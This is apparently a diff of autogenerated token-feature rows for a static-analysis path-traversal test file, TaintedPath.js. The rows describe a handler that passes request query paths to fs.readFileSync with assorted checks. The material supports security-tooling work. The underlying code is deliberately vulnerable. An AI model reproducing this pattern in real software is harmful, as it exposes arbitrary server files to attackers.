tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:9:33:9:36 | true | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:9:33:9:36 | true | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:9:33:9:36 | true | receiverName | url | +| autogenerated/TaintedPath/TaintedPath.js:9:39:9:43 | query | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:9:39:9:43 | query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:9:39:9:43 | query | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:9:39:9:43 | query | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:9:39:9:43 | query | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:9:45:9:48 | path | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:9:45:9:48 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:9:45:9:48 | path | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:9:45:9:48 | path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:9:45:9:48 | path | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:12:3:12:5 | res | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:12:3:12:5 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:12:3:12:5 | res | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:12:3:12:5 | res | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:12:3:12:5 | res | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:12:3:12:11 | res.write | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:12:3:12:11 | res.write | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:12:3:12:11 | res.write | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:12:3:12:11 | res.write | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:12:3:12:11 | res.write | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:12:3:12:34 | exceptional return of res.wri ... (path)) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:12:3:12:34 | exceptional return of res.wri ... (path)) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:12:3:12:34 | exceptional return of res.wri ... (path)) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:12:3:12:34 | exceptional return of res.wri ... (path)) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:12:3:12:34 | exceptional return of res.wri ... (path)) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:12:3:12:34 | res.wri ... (path)) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:12:3:12:34 | res.wri ... (path)) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:12:3:12:34 | res.wri ... (path)) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:12:3:12:34 | res.wri ... (path)) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:12:3:12:34 | res.wri ... (path)) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:12:7:12:11 | write | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:12:7:12:11 | write | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:12:7:12:11 | write | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:12:7:12:11 | write | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:12:7:12:11 | write | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:12:13:12:14 | fs | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:12:13:12:14 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:12:13:12:14 | fs | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:12:13:12:14 | fs | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:12:13:12:14 | fs | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:12:13:12:27 | fs.readFileSync | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:12:13:12:27 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:12:13:12:27 | fs.readFileSync | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:12:13:12:27 | fs.readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:12:13:12:27 | fs.readFileSync | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:12:13:12:33 | exceptional return of fs.read ... c(path) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:12:13:12:33 | exceptional return of fs.read ... c(path) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:12:13:12:33 | exceptional return of fs.read ... c(path) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:12:13:12:33 | exceptional return of fs.read ... c(path) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:12:13:12:33 | exceptional return of fs.read ... c(path) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:12:13:12:33 | fs.read ... c(path) | CalleeFlexibleAccessPath | res.write | | autogenerated/TaintedPath/TaintedPath.js:12:13:12:33 | fs.read ... c(path) | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:12:13:12:33 | fs.read ... c(path) | contextFunctionInterfaces | views_local(req, res) | @@ -4707,6 +58360,11 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:12:13:12:33 | fs.read ... c(path) | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:12:13:12:33 | fs.read ... c(path) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:12:13:12:33 | fs.read ... c(path) | receiverName | res | +| autogenerated/TaintedPath/TaintedPath.js:12:16:12:27 | readFileSync | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:12:16:12:27 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:12:16:12:27 | readFileSync | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:12:16:12:27 | readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:12:16:12:27 | readFileSync | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:12:29:12:32 | path | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/TaintedPath.js:12:29:12:32 | path | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:12:29:12:32 | path | calleeImports | fs | @@ -4716,6 +58374,46 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:12:29:12:32 | path | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:12:29:12:32 | path | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:12:29:12:32 | path | receiverName | fs | +| autogenerated/TaintedPath/TaintedPath.js:15:3:15:5 | res | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:15:3:15:5 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:15:3:15:5 | res | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:15:3:15:5 | res | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:15:3:15:5 | res | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:15:3:15:11 | res.write | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:15:3:15:11 | res.write | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:15:3:15:11 | res.write | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:15:3:15:11 | res.write | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:15:3:15:11 | res.write | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:15:3:15:50 | exceptional return of res.wri ... path)) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:15:3:15:50 | exceptional return of res.wri ... path)) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:15:3:15:50 | exceptional return of res.wri ... path)) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:15:3:15:50 | exceptional return of res.wri ... path)) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:15:3:15:50 | exceptional return of res.wri ... path)) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:15:3:15:50 | res.wri ... path)) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:15:3:15:50 | res.wri ... path)) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:15:3:15:50 | res.wri ... path)) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:15:3:15:50 | res.wri ... path)) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:15:3:15:50 | res.wri ... path)) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:15:7:15:11 | write | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:15:7:15:11 | write | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:15:7:15:11 | write | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:15:7:15:11 | write | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:15:7:15:11 | write | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:15:13:15:14 | fs | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:15:13:15:14 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:15:13:15:14 | fs | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:15:13:15:14 | fs | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:15:13:15:14 | fs | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:15:13:15:27 | fs.readFileSync | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:15:13:15:27 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:15:13:15:27 | fs.readFileSync | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:15:13:15:27 | fs.readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:15:13:15:27 | fs.readFileSync | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:15:13:15:49 | exceptional return of fs.read ... + path) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:15:13:15:49 | exceptional return of fs.read ... + path) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:15:13:15:49 | exceptional return of fs.read ... + path) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:15:13:15:49 | exceptional return of fs.read ... + path) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:15:13:15:49 | exceptional return of fs.read ... + path) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:15:13:15:49 | fs.read ... + path) | CalleeFlexibleAccessPath | res.write | | autogenerated/TaintedPath/TaintedPath.js:15:13:15:49 | fs.read ... + path) | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:15:13:15:49 | fs.read ... + path) | contextFunctionInterfaces | views_local(req, res) | @@ -4724,6 +58422,17 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:15:13:15:49 | fs.read ... + path) | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:15:13:15:49 | fs.read ... + path) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:15:13:15:49 | fs.read ... + path) | receiverName | res | +| autogenerated/TaintedPath/TaintedPath.js:15:16:15:27 | readFileSync | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:15:16:15:27 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:15:16:15:27 | readFileSync | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path 